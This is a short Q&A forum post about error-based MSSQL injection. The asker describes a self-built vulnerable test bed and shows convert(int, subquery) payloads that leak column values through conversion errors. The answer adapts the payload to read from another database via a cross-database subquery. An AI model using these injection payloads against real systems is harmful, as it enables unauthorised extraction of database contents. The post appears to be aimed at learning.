# MSSQL Injection extracting column data from another database

Tags: sql-server, sql-injection

I setup a test-bed application vulnerable to mssql injection and i  wondered, how do i extract column data from another database? To extract column data from current database we do:

```
convert(int,(select columnnamegoeshere from tablenamegoeshere))--
```

and then to enumerate the other column data we do:

```
convert(int,(select columnnamegoeshere from tablenamegoeshere where columnnamegoeshere not in ('firstentryfromcolumn')))--
```

But if it's not inside the default database and we want to extract column data from another database, how do we do that? Thanks.

Answer (score 0):

I would do a join... but, to keep it simple for you, here's your code using a different database column:

```
convert(int,(select columnnamegoeshere from tablenamegoeshere where columnnamegoeshere not in (select top 1 firstentryfromcolumn from otherdb.dbo.otherdbtable)))
```

It would be better to join the 2 tables together and exclude the records if that's possible... subqueries are usually slower and not the best way to go about it.